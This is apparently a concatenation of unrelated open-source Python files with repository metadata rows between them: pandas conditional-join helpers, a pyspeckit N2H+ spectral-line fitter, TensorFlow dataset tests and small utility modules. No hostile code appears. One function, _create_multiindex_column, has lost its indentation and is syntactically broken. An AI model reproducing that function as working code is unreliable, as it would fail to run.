            if le_lt is None:
                le_lt = condition
        elif op in greater_than_join_types:
            if ge_gt is None:
                ge_gt = condition
        if le_lt and ge_gt:
            break
    # optimised path - range join
    if le_lt and ge_gt:
        rest = [
            condition
            for condition in conditions
            if condition not in (ge_gt, le_lt)
        ]
        if rest:
            rest = (
                (df[left_on], right[right_on], op)
                for left_on, right_on, op in rest
            )
        else:
            rest = None
        return _range_indices(df, right, ge_gt, le_lt, rest)
    # no optimised path: resolve the single non-equi condition with a
    # binary search, then prune with the remaining conditions.
    # (The original code duplicated this logic verbatim for the le_lt
    # and ge_gt cases; at most one of them can be set here, so the two
    # branches are unified.)
    base = le_lt or ge_gt
    if base is None:
        return None
    remaining = (
        (df[left_on], right[right_on], op)
        for left_on, right_on, op in conditions
        if (left_on, right_on, op) != base
    )
    left_on, right_on, op = base
    outcome = _generic_func_cond_join(
        df[left_on],
        right[right_on],
        op,
        multiple_conditions=False,
    )
    if outcome is None:
        return None
    return _generate_indices(*outcome, remaining)
def _range_indices(
    df: pd.DataFrame,
    right: pd.DataFrame,
    first: tuple,
    second: tuple,
    rest: tuple = None,
):
    """
    Retrieve index positions for range/interval joins.

    Idea inspired by article:
    https://www.vertica.com/blog/what-is-a-range-join-and-why-is-it-so-fastba-p223413/

    :param first: the greater-than condition tuple
        (left_column, right_column, op).
    :param second: the less-than condition tuple.
    :param rest: optional iterable of additional conditions used for
        final pruning.
    :returns: tuple of (left_index, right_index), or None.
    """
    # summary of code for range join:
    # get the positions where start_left is >/>= start_right
    # then within the positions,
    # get the positions where end_left is </<= end_right
    # this should reduce the search space
    left_on, right_on, op = first
    strict = False
    if op == _JoinOperator.GREATER_THAN.value:
        strict = True
    outcome = _greater_than_indices(
        df[left_on],
        right[right_on],
        strict,
        multiple_conditions=True,
    )
    if outcome is None:
        return None
    left_index, right_index, search_indices = outcome
    left_on, right_on, op = second
    right_c = right.loc[right_index, right_on]
    left_c = df.loc[left_index, left_on]
    left_c = extract_array(left_c, extract_numpy=True)
    op = operator_map[op]
    # `pos` records, per left row, the lowest right position that
    # satisfies the second (less-than) condition
    pos = np.copy(search_indices)
    counter = np.arange(left_index.size)
    ext_arr = is_extension_array_dtype(left_c)
    dupes = right_c.duplicated(keep="first")
    right_c = extract_array(right_c, extract_numpy=True)
    # use position, not label
    uniqs_index = np.arange(right_c.size)
    if dupes.any():
        uniqs_index = uniqs_index[~dupes]
        right_c = right_c[~dupes]
    # walk the unique right values; once a left row matches it is
    # retired, so each left row keeps its first (lowest) position
    for ind in range(uniqs_index.size):
        if not counter.size:
            break
        keep_rows = op(left_c, right_c[ind])
        if ext_arr:
            keep_rows = keep_rows.to_numpy(
                dtype=bool, na_value=False, copy=False
            )
        if not keep_rows.any():
            continue
        # get the index positions where left_c is </<= right_c
        # that minimum position combined with the equivalent position
        # from search_indices becomes our search space
        # for the equivalent left_c index
        pos[counter[keep_rows]] = uniqs_index[ind]
        counter = counter[~keep_rows]
        left_c = left_c[~keep_rows]
    dupes = None
    uniqs_index = None
    # no point searching within (a, b)
    # if a == b
    # since range(a, b) yields none
    keep_rows = pos < search_indices
    if not keep_rows.any():
        return None
    if not keep_rows.all():
        left_index = left_index[keep_rows]
        pos = pos[keep_rows]
        search_indices = search_indices[keep_rows]
    repeater = search_indices - pos
    right_index = [
        right_index[start:end] for start, end in zip(pos, search_indices)
    ]
    # get indices and filter to get exact indices
    # that meet the condition
    right_index = np.concatenate(right_index)
    left_index = np.repeat(left_index, repeater)
    # here we search for actual positions
    # where left_c is </<= right_c
    # safe to index the arrays, since we are picking the positions
    # which are all in the original `df` and `right`
    # doing this allows some speed gains
    # while still ensuring correctness
    left_c = extract_array(df[left_on], extract_numpy=True)[left_index]
    right_c = extract_array(right[right_on], extract_numpy=True)[right_index]
    mask = op(left_c, right_c)
    if ext_arr:
        mask = mask.to_numpy(dtype=bool, na_value=False)
    if not mask.all():
        left_index = left_index[mask]
        right_index = right_index[mask]
    if not rest:
        return left_index, right_index
    return _generate_indices(left_index, right_index, rest)
def _cond_join_select_columns(columns: Any, df: pd.DataFrame):
    """
    Select and/or rename columns in a DataFrame.

    :param columns: selection spec passed to ``select_columns``;
        a dict additionally maps old column names to new ones.
    :param df: DataFrame to subset.
    :returns: a Pandas DataFrame with the selected (renamed) columns.
    """
    selected = df.select_columns(columns)
    if isinstance(columns, dict):
        # a dict doubles as a renaming map; unmapped names are kept
        selected.columns = [columns.get(col, col) for col in selected]
    return selected
def _create_multiindex_column(df: pd.DataFrame, right: pd.DataFrame):
"""
Create a MultiIndex column for conditional_join.
"""
header = [np.array(["left"]).repeat(df.columns.size)]
columns = [
df.columns.get_level_values(n) for n in range(df.columns.nlevels)
]
header.extend(columns)
df.columns = pd.MultiIndex.from_arrays(header)
header = [np.array(["right"]).repeat(right.columns.size)]
columns = [
right.columns.get_level_values(n) for n in range(right.columns.nlevels)
]
header.extend(columns)
right.columns = pd.MultiIndex.from_arrays(header)
header = None
return df, right
def _create_conditional_join_empty_frame(
    df: pd.DataFrame,
    right: pd.DataFrame,
    how: str,
    df_columns: Any,
    right_columns: Any,
):
    """
    Create the final dataframe for a conditional join
    when there are no matches.

    :param how: join type - 'inner', 'left' or 'right'.
    :param df_columns: optional selection/renaming spec for ``df``.
    :param right_columns: optional selection/renaming spec for ``right``.
    :returns: an empty DataFrame (inner) or a one-sided frame with
        all-null columns from the non-matching side (left/right).
    """
    if df_columns:
        df = _cond_join_select_columns(df_columns, df)
    if right_columns:
        right = _cond_join_select_columns(right_columns, right)
    # overlapping names get a 'left'/'right' top level
    if set(df.columns).intersection(right.columns):
        df, right = _create_multiindex_column(df, right)
    if how == _JoinTypes.INNER.value:
        # inner join with no matches -> empty frame, dtypes preserved
        df = df.dtypes.to_dict()
        right = right.dtypes.to_dict()
        df = {**df, **right}
        df = {key: pd.Series([], dtype=value) for key, value in df.items()}
        return pd.DataFrame(df, copy=False)
    if how == _JoinTypes.LEFT.value:
        # the unmatched side will be filled with NaN, so integer
        # columns are widened to float to accommodate the nulls
        right = right.dtypes.to_dict()
        right = {
            key: float if dtype.kind == "i" else dtype
            for key, dtype in right.items()
        }
        right = {
            key: pd.Series([], dtype=value) for key, value in right.items()
        }
        right = pd.DataFrame(right, copy=False)
    else:  # how == 'right'
        # mirror of the 'left' case: widen integer columns of `df`
        df = df.dtypes.to_dict()
        df = {
            key: float if dtype.kind == "i" else dtype
            for key, dtype in df.items()
        }
        df = {key: pd.Series([], dtype=value) for key, value in df.items()}
        df = pd.DataFrame(df, copy=False)
    df = pd.merge(
        df,
        right,
        left_index=True,
        right_index=True,
        how=how,
        copy=False,
        sort=False,
    )
    df.index = range(len(df))
    return df
def _create_conditional_join_frame(
    df: pd.DataFrame,
    right: pd.DataFrame,
    left_index: np.ndarray,
    right_index: np.ndarray,
    how: str,
    sort_by_appearance: bool,
    df_columns: Any,
    right_columns: Any,
):
    """
    Create the final dataframe for a conditional join
    when there are matches.

    :param left_index: integer positions into ``df``.
    :param right_index: integer positions into ``right``.
    :param how: join type - 'inner', 'left' or 'right'.
    :param sort_by_appearance: if True, order the output rows by their
        appearance in ``df`` (then ``right``).
    :param df_columns: optional selection/renaming spec for ``df``.
    :param right_columns: optional selection/renaming spec for ``right``.
    :returns: the joined DataFrame with a fresh RangeIndex.
    """
    if sort_by_appearance:
        # lexsort: primary key is the left index, ties broken by right
        sorter = np.lexsort((right_index, left_index))
        right_index = right_index[sorter]
        left_index = left_index[sorter]
        sorter = None
    if df_columns:
        df = _cond_join_select_columns(df_columns, df)
    if right_columns:
        right = _cond_join_select_columns(right_columns, right)
    # overlapping names get a 'left'/'right' top level
    if set(df.columns).intersection(right.columns):
        df, right = _create_multiindex_column(df, right)
    if how == _JoinTypes.INNER.value:
        # fast path: slice the underlying arrays directly
        df = {
            key: extract_array(value, extract_numpy=True)[left_index]
            for key, value in df.items()
        }
        right = {
            key: extract_array(value, extract_numpy=True)[right_index]
            for key, value in right.items()
        }
        return pd.DataFrame({**df, **right}, copy=False)
    # dirty tests show slight speed gain when copy=False
    # which is achievable only within pd.merge
    if how == _JoinTypes.LEFT.value:
        # align the matched right rows on the left index,
        # then let pd.merge fill the unmatched left rows
        right = right.loc[right_index]
        right.index = left_index
    else:
        df = df.loc[left_index]
        df.index = right_index
    df = pd.merge(
        df,
        right,
        left_index=True,
        right_index=True,
        how=how,
        copy=False,
        sort=False,
    )
    df.index = range(len(df))
    return df
| 31.086559
| 86
| 0.622561
|
acff8278abc4a903f5005748a2a8cde8749a5cca
| 6,293
|
py
|
Python
|
pyspeckit/spectrum/models/n2hp.py
|
glangsto/pyspeckit
|
346b24fb828d1d33c7891cdde7609723e51af34c
|
[
"MIT"
] | null | null | null |
pyspeckit/spectrum/models/n2hp.py
|
glangsto/pyspeckit
|
346b24fb828d1d33c7891cdde7609723e51af34c
|
[
"MIT"
] | 1
|
2021-05-14T19:17:41.000Z
|
2021-05-14T19:17:41.000Z
|
pyspeckit/spectrum/models/n2hp.py
|
glangsto/pyspeckit
|
346b24fb828d1d33c7891cdde7609723e51af34c
|
[
"MIT"
] | null | null | null |
"""
===========
N2H+ fitter
===========
Reference for line params:
Daniel, F., Dubernet, M.-L., Meuwly, M., Cernicharo, J., Pagani, L. 2005, MNRAS 363, 1083
http://www.strw.leidenuniv.nl/~moldata/N2H+.html
http://adsabs.harvard.edu/abs/2005MNRAS.363.1083D
Does not yet implement: http://adsabs.harvard.edu/abs/2010ApJ...716.1315K
Module API
^^^^^^^^^^
"""
from __future__ import print_function
import numpy as np
import matplotlib.cbook as mpcb
import copy
from astropy.extern.six import iteritems
try:
from astropy.io import fits as pyfits
except ImportError:
import pyfits
try:
import scipy.interpolate
import scipy.ndimage
scipyOK = True
except ImportError:
scipyOK=False
from ...mpfit import mpfit
from .. import units
from . import fitter,model,modelgrid
from . import hyperfine
# Rest frequencies (Hz) of the 15 hyperfine components of the N2H+
# J=1-0 transition, keyed by 'JF1F-JF1F' quantum-number labels
# (reference: Daniel et al. 2005, MNRAS 363, 1083 - see module docstring).
freq_dict = {
    '110-011': 93.171617e9,
    '112-011': 93.171913e9,
    '112-012': 93.171913e9,
    '111-010': 93.172048e9,
    '111-011': 93.172048e9,
    '111-012': 93.172048e9,
    '122-011': 93.173475e9,
    '122-012': 93.173475e9,
    '123-012': 93.173772e9,
    '121-010': 93.173963e9,
    '121-011': 93.173963e9,
    '121-012': 93.173963e9,
    '101-010': 93.176261e9,
    '101-011': 93.176261e9,
    '101-012': 93.176261e9,
}
# Einstein A coefficients per component; units are not stated in this
# file - presumably 1e-5 s^-1 as tabulated by Daniel et al. 2005 /
# LAMDA - TODO confirm against the reference.
aval_dict = {
    '110-011': 3.628,
    '112-011': 0.907,
    '112-012': 2.721,
    '111-010': 1.209,
    '111-011': 0.907,
    '111-012': 1.512,
    '122-011': 2.721,
    '122-012': 0.907,
    '123-012': 3.628,
    '121-010': 2.015,
    '121-011': 1.512,
    '121-012': 0.101,
    '101-010': 0.403,
    '101-011': 1.209,
    '101-012': 2.016,
}
line_strength_dict = {  # effectively the degeneracy per rotation state...
    '110-011': 0.333,
    '112-011': 0.417,
    '112-012': 1.250,
    '111-010': 0.333,
    '111-011': 0.250,
    '111-012': 0.417,
    '122-011': 1.250,
    '122-012': 0.417,
    '123-012': 2.330,
    '121-010': 0.556,
    '121-011': 0.417,
    '121-012': 0.028,
    '101-010': 0.111,
    '101-011': 0.333,
    '101-012': 0.55,
}
# Total spin degeneracy shared by all components (sum of the line
# strengths above, see the normalization note below this block).
relative_strength_total_degeneracy = {
    '110-011': 9.0,
    '112-011': 9.0,
    '112-012': 9.0,
    '111-010': 9.0,
    '111-011': 9.0,
    '111-012': 9.0,
    '122-011': 9.0,
    '122-012': 9.0,
    '123-012': 9.0,
    '121-010': 9.0,
    '121-011': 9.0,
    '121-012': 9.0,
    '101-010': 9.0,
    '101-011': 9.0,
    '101-012': 9.0,
}
"""
Line strengths of the 15 hyperfine components in J=1-0 transition. The
thickness of the lines indicates their relative weight compared to the others.
Line strengths are normalized in such a way that summing over all initial J = 1
levels gives the degeneracy of the J = 0 levels, i.e., five for JF1F 012,
three for JF1F 011, and one for JF1F 010. Thus, the sum over all 15
transitions gives the total spin degeneracy
"""
# Labels of the 15 hyperfine components.
line_names = tuple(freq_dict.keys())

# Speed of light in km/s.
ckms = units.speedoflight_ms / 1e3  # 2.99792458e5

# Velocity offset (km/s) of each component relative to the
# 93.176261 GHz (101-01x) reference frequency.
voff_lines_dict = dict([(k, (v - 93.176261e9) / 93.176261e9 * ckms)
                        for k, v in iteritems(freq_dict)])

# Hyperfine model for N2H+ 1-0 and the fitters this module exports.
n2hp_vtau = hyperfine.hyperfinemodel(line_names, voff_lines_dict, freq_dict,
                                     line_strength_dict,
                                     relative_strength_total_degeneracy)
n2hp_vtau_fitter = n2hp_vtau.fitter
n2hp_vtau_vheight_fitter = n2hp_vtau.vheight_fitter
def n2hp_radex(xarr,
               density=4,
               column=13,
               xoff_v=0.0,
               width=1.0,
               grid_vwidth=1.0,
               grid_vwidth_scale=False,
               texgrid=None,
               taugrid=None,
               hdr=None,
               path_to_texgrid='',
               path_to_taugrid='',
               temperature_gridnumber=3,
               debug=False,
               verbose=False,
               **kwargs):
    """
    Use a grid of RADEX-computed models to make a model line spectrum

    The RADEX models have to be available somewhere.
    OR they can be passed as arrays.  If as arrays, the form should be:
    texgrid = ((minfreq1,maxfreq1,texgrid1),(minfreq2,maxfreq2,texgrid2))

    xarr must be a SpectroscopicAxis instance
    xoff_v, width are both in km/s
    density and column are in log10 units

    grid_vwidth is the velocity assumed when computing the grid in km/s
    this is important because tau = modeltau / width (see, e.g.,
    Draine 2011 textbook pgs 219-230)
    grid_vwidth_scale is True or False: False for LVG, True for Sphere

    NOTE(review): grid_vwidth and grid_vwidth_scale are accepted but
    never used in this implementation - confirm whether tau should be
    rescaled by width as in other pyspeckit radex fitters.
    """
    if texgrid is None and taugrid is None:
        if path_to_texgrid == '' or path_to_taugrid == '':
            raise IOError("Must specify model grids to use.")
        else:
            # load tau/tex cubes and reconstruct the (log density,
            # log column) axes from the FITS WCS keywords
            taugrid = [pyfits.getdata(path_to_taugrid)]
            texgrid = [pyfits.getdata(path_to_texgrid)]
            hdr = pyfits.getheader(path_to_taugrid)
            yinds, xinds = np.indices(taugrid[0].shape[1:])
            densityarr = (xinds+hdr['CRPIX1']-1)*hdr['CD1_1']+hdr['CRVAL1']  # log density
            columnarr = (yinds+hdr['CRPIX2']-1)*hdr['CD2_2']+hdr['CRVAL2']  # log column
            minfreq = (4.8,)
            maxfreq = (5.0,)
    elif len(taugrid) == len(texgrid) and hdr is not None:
        # grids passed in as ((minfreq, maxfreq, grid), ...) tuples
        minfreq, maxfreq, texgrid = zip(*texgrid)
        minfreq, maxfreq, taugrid = zip(*taugrid)
        yinds, xinds = np.indices(taugrid[0].shape[1:])
        densityarr = (xinds+hdr['CRPIX1']-1)*hdr['CD1_1']+hdr['CRVAL1']  # log density
        columnarr = (yinds+hdr['CRPIX2']-1)*hdr['CD2_2']+hdr['CRVAL2']  # log column
    else:
        raise Exception("Invalid grid specification: pass matching "
                        "taugrid/texgrid lists along with a header.")

    # Convert X-units to frequency in GHz
    xarr = copy.copy(xarr)
    xarr.convert_to_unit('Hz', quiet=True)

    # interpolate the requested (density, column) onto grid pixel coords
    gridval1 = np.interp(density, densityarr[0, :], xinds[0, :])
    gridval2 = np.interp(column, columnarr[:, 0], yinds[:, 0])
    if np.isnan(gridval1) or np.isnan(gridval2):
        raise ValueError("Invalid column/density")

    if scipyOK:
        # bilinear interpolation within the chosen temperature slice
        tau = [scipy.ndimage.map_coordinates(tg[temperature_gridnumber, :, :],
                                             np.array([[gridval2], [gridval1]]),
                                             order=1)
               for tg in taugrid]
        tex = [scipy.ndimage.map_coordinates(tg[temperature_gridnumber, :, :],
                                             np.array([[gridval2], [gridval1]]),
                                             order=1)
               for tg in texgrid]
    else:
        raise ImportError("Couldn't import scipy, therefore cannot interpolate")

    if verbose:
        # BUG FIX: `tau` and `tex` are lists of 1-element arrays; the
        # previous "%20.12g" format raised TypeError whenever
        # verbose=True, because %g cannot format a list.
        print("density %20.12g column %20.12g: tau %s tex %s"
              % (density, column, tau, tex))

    if debug:
        import pdb
        pdb.set_trace()

    return n2hp_vtau(xarr, Tex=tex, tau=tau, xoff_v=xoff_v, width=width,
                     **kwargs)
| 30.400966
| 137
| 0.652789
|
acff82d11db38f562ad822755b2bdf7c25d70844
| 615
|
py
|
Python
|
fastlvm/__init__.py
|
autonlab/fastlvm
|
05e77da39ca525eacf1a1e3aa2cc551e6cf18dcd
|
[
"MIT"
] | 4
|
2019-08-06T08:59:28.000Z
|
2022-03-21T19:36:48.000Z
|
fastlvm/__init__.py
|
autonlab/fastlvm
|
05e77da39ca525eacf1a1e3aa2cc551e6cf18dcd
|
[
"MIT"
] | 10
|
2019-05-20T20:20:47.000Z
|
2020-06-04T14:33:04.000Z
|
fastlvm/__init__.py
|
autonlab/fastlvm
|
05e77da39ca525eacf1a1e3aa2cc551e6cf18dcd
|
[
"MIT"
] | 2
|
2021-03-18T19:29:03.000Z
|
2022-03-21T13:41:14.000Z
|
from .covertree import CoverTree
from .covertree_classifier import CoverTreeClassifier
from .covertree_regressor import CoverTreeRegressor
from .kmeans import KMeans
from .gmm import GMM
from .lda import LDA
from .hdp import HDP
from .glda import GLDA
from .utils import read_corpus
#__version__ = '0.0.1'
#__author__ = 'CMU'
#__metadata__ = {
# "languages": ["python3.6", "python3.5"],
# "library": "fastlvm",
# "source_code": "https://github.com/manzilzaheer/fastlvm.git",
# "build": [{
# "type": "pip",
# "package": "git+https://github.com/manzilzaheer/fastlvm.git@d3m"
# }],
#
#}
| 25.625
| 73
| 0.689431
|
acff833c12ae018e518ed734f4fa79415a158bed
| 313
|
py
|
Python
|
test/selenium/src/lib/constants/files.py
|
pavelglebov/ggrc-core
|
f99bfdaa11ad30643d7bc9af67bd84436d298cfa
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-01-12T23:46:00.000Z
|
2019-01-12T23:46:00.000Z
|
test/selenium/src/lib/constants/files.py
|
pavelglebov/ggrc-core
|
f99bfdaa11ad30643d7bc9af67bd84436d298cfa
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/selenium/src/lib/constants/files.py
|
pavelglebov/ggrc-core
|
f99bfdaa11ad30643d7bc9af67bd84436d298cfa
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""File's labels and properties."""
class TransformationCSVFields(object):
    """Labels used when transforming fields of CSV files."""
    # pylint: disable=too-few-public-methods

    # Column header for the revision-date field in a CSV export.
    REVISION_DATE = "Revision Date"
| 31.3
| 78
| 0.734824
|
acff83c239625b03af04f64cd3b43d5c3bc3fa8b
| 10,356
|
py
|
Python
|
tensorflow/contrib/data/python/kernel_tests/dataset_constructor_op_test.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 13
|
2017-02-22T02:20:06.000Z
|
2018-06-06T04:18:03.000Z
|
tensorflow/contrib/data/python/kernel_tests/dataset_constructor_op_test.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/data/python/kernel_tests/dataset_constructor_op_test.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 3
|
2017-06-09T10:39:33.000Z
|
2021-04-08T16:13:30.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import nest
class DatasetConstructorTest(test.TestCase):
def testTensorDataset(self):
"""Test an dataset that represents a single tuple of tensors."""
components = [np.array(1), np.array([1, 2, 3]), np.array(37.0)]
iterator = (dataset_ops.Dataset.from_tensors(components)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
sess.run(init_op)
results = sess.run(get_next)
for component, result_component in zip(components, results):
self.assertAllEqual(component, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testTensorSliceDataset(self):
"""Test an dataset that represents the slices from a tuple of tensors."""
components = [
np.tile(np.array([[1], [2], [3], [4]]), 20), np.tile(
np.array([[12], [13], [14], [15]]), 22),
np.array([37.0, 38.0, 39.0, 40.0])
]
iterator = (dataset_ops.Dataset.from_tensor_slices(components)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
sess.run(init_op)
for i in range(4):
results = sess.run(get_next)
for component, result_component in zip(components, results):
self.assertAllEqual(component[i], result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseTensorSliceDataset(self):
"""Test a dataset based on slices of a `tf.SparseTensor`."""
st = array_ops.sparse_placeholder(dtypes.float64)
iterator = (dataset_ops.Dataset.from_sparse_tensor_slices(st)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = sparse_tensor.SparseTensor(*iterator.get_next())
with self.test_session() as sess:
slices = [[1., 2., 3.], [1.], [1.], [1., 2.], [], [1., 2.], [], [], []]
# Test with sparse tensor in the appropriate order.
indices = np.array(
[[i, j] for i in range(len(slices)) for j in range(len(slices[i]))])
values = np.array([val for s in slices for val in s])
dense_shape = np.array([len(slices), max(len(s) for s in slices) + 1])
sparse_feed = sparse_tensor.SparseTensorValue(indices, values,
dense_shape)
sess.run(init_op, feed_dict={st: sparse_feed})
for i, s in enumerate(slices):
results = sess.run(get_next)
self.assertAllEqual(s, results.values)
expected_indices = np.array(
[[j] for j in range(len(slices[i]))]).reshape([-1, 1])
self.assertAllEqual(expected_indices, results.indices)
self.assertAllEqual(dense_shape[1:], results.dense_shape)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test with sparse tensor in the reverse order, which is not
# currently supported.
reverse_order_indices = indices[::-1, :]
reverse_order_values = values[::-1]
sparse_feed = sparse_tensor.SparseTensorValue(
reverse_order_indices, reverse_order_values, dense_shape)
with self.assertRaises(errors.UnimplementedError):
sess.run(init_op, feed_dict={st: sparse_feed})
# Test with an empty sparse tensor.
empty_indices = np.empty((0, 4), dtype=np.int64)
empty_values = np.empty((0,), dtype=np.float64)
empty_dense_shape = [0, 4, 37, 9]
sparse_feed = sparse_tensor.SparseTensorValue(empty_indices, empty_values,
empty_dense_shape)
sess.run(init_op, feed_dict={st: sparse_feed})
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# pylint: disable=g-long-lambda,unnecessary-lambda
def testNestedStructure(self):
components = (np.array([1, 2, 3]), (np.array([4., 5.]), np.array([6., 7.])),
np.array([8, 9, 10]))
dataset = dataset_ops.Dataset.from_tensors(components)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.shuffle(10, 10)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.repeat(-1)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.filter(lambda x, y, z: True)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.take(5)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.map(lambda x, y, z: ((x, z), (y[0], y[1])))
self.assertEquals(((dtypes.int64, dtypes.int64),
(dtypes.float64, dtypes.float64)), dataset.output_types)
self.assertEquals((([3], [3]), ([2], [2])), dataset.output_shapes)
dataset = dataset.flat_map(
lambda x, y: dataset_ops.Dataset.from_tensors(((x[0], x[1]),
(y[0], y[1])))
)
self.assertEquals(((dtypes.int64, dtypes.int64),
(dtypes.float64, dtypes.float64)), dataset.output_types)
self.assertEquals((([3], [3]), ([2], [2])), dataset.output_shapes)
dataset = dataset.batch(32)
self.assertEquals(((dtypes.int64, dtypes.int64),
(dtypes.float64, dtypes.float64)), dataset.output_types)
self.assertEquals((([None, 3], [None, 3]), ([None, 2], [None, 2])),
nest.pack_sequence_as(dataset.output_shapes, [
s.as_list()
for s in nest.flatten(dataset.output_shapes)
]))
iterator = dataset.make_one_shot_iterator()
(w, x), (y, z) = iterator.get_next()
self.assertEquals(dtypes.int64, w.dtype)
self.assertEquals(dtypes.int64, x.dtype)
self.assertEquals(dtypes.float64, y.dtype)
self.assertEquals(dtypes.float64, z.dtype)
self.assertEquals([None, 3], w.shape.as_list())
self.assertEquals([None, 3], x.shape.as_list())
self.assertEquals([None, 2], y.shape.as_list())
self.assertEquals([None, 2], z.shape.as_list())
iterator = dataset.make_initializable_iterator()
(w, x), (y, z) = iterator.get_next()
self.assertEquals(dtypes.int64, w.dtype)
self.assertEquals(dtypes.int64, x.dtype)
self.assertEquals(dtypes.float64, y.dtype)
self.assertEquals(dtypes.float64, z.dtype)
self.assertEquals([None, 3], w.shape.as_list())
self.assertEquals([None, 3], x.shape.as_list())
self.assertEquals([None, 2], y.shape.as_list())
self.assertEquals([None, 2], z.shape.as_list())
# Define a separate set of components with matching leading
# dimension for the from-slices constructor.
components_for_slices = (np.array([1, 2, 3]), (np.array(
[4., 5., 6.]), np.array([7., 8., 9.])), np.array([10, 11, 12]))
dataset = dataset_ops.Dataset.from_tensor_slices(components_for_slices)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([], ([], []), []), dataset.output_shapes)
def testNonSequenceNestedStructure(self):
components = np.array([1, 2, 3])
dataset = dataset_ops.Dataset.from_tensors(components)
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([3], dataset.output_shapes)
dataset = dataset.filter(
lambda x: math_ops.reduce_all(math_ops.equal(x, components)))
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([3], dataset.output_shapes)
dataset = dataset.map(lambda x: array_ops.stack([x, x]))
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([2, 3], dataset.output_shapes)
dataset = dataset.flat_map(
lambda x: dataset_ops.Dataset.from_tensor_slices(x))
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([3], dataset.output_shapes)
iterator = dataset.make_one_shot_iterator()
get_next = iterator.get_next()
self.assertEquals(dtypes.int64, get_next.dtype)
self.assertEquals([3], get_next.shape)
if __name__ == "__main__":
test.main()
| 43.15
| 80
| 0.650058
|
acff85e553d3ccd1d18d5ed436237694884b2974
| 65
|
py
|
Python
|
Hello02.py
|
indraputra147/belajarpython
|
13ed3e73a75f25cc6c2c0e1fc7af17ffa53e5760
|
[
"MIT"
] | null | null | null |
Hello02.py
|
indraputra147/belajarpython
|
13ed3e73a75f25cc6c2c0e1fc7af17ffa53e5760
|
[
"MIT"
] | null | null | null |
Hello02.py
|
indraputra147/belajarpython
|
13ed3e73a75f25cc6c2c0e1fc7af17ffa53e5760
|
[
"MIT"
] | null | null | null |
name = input("Input your name : ")
print("Hello, " + name + "!")
| 21.666667
| 34
| 0.553846
|
acff8615480dc9f5ce4e3a46f2700f7910878135
| 238
|
py
|
Python
|
beproud/django/commons/templatetags/datetime_tags.py
|
beproud/bpcommons
|
c24aed4143d743b1af6c621630ed9faa7e1ccaa4
|
[
"BSD-2-Clause"
] | 2
|
2016-03-07T01:52:12.000Z
|
2017-08-30T06:14:43.000Z
|
beproud/django/commons/templatetags/datetime_tags.py
|
beproud/bpcommons
|
c24aed4143d743b1af6c621630ed9faa7e1ccaa4
|
[
"BSD-2-Clause"
] | 18
|
2015-03-08T13:52:18.000Z
|
2022-01-25T02:46:09.000Z
|
beproud/django/commons/templatetags/datetime_tags.py
|
beproud/bpcommons
|
c24aed4143d743b1af6c621630ed9faa7e1ccaa4
|
[
"BSD-2-Clause"
] | 2
|
2015-02-07T01:33:00.000Z
|
2015-09-08T14:57:44.000Z
|
# vim:fileencoding=utf-8
from django.template import Library
from beproud.django.commons.utils.timeutils import relative_time as rel_time
register = Library()
@register.filter
def relative_time(s):
return rel_time(s) if s else ""
| 19.833333
| 76
| 0.777311
|
acff86558270616b2483226db202b065facfa76f
| 2,104
|
py
|
Python
|
python/tests/app_sim1.py
|
multiscale-cosim/EBRAINS-translators
|
ac48debf85e83674dad4b54aa1daf5419465f805
|
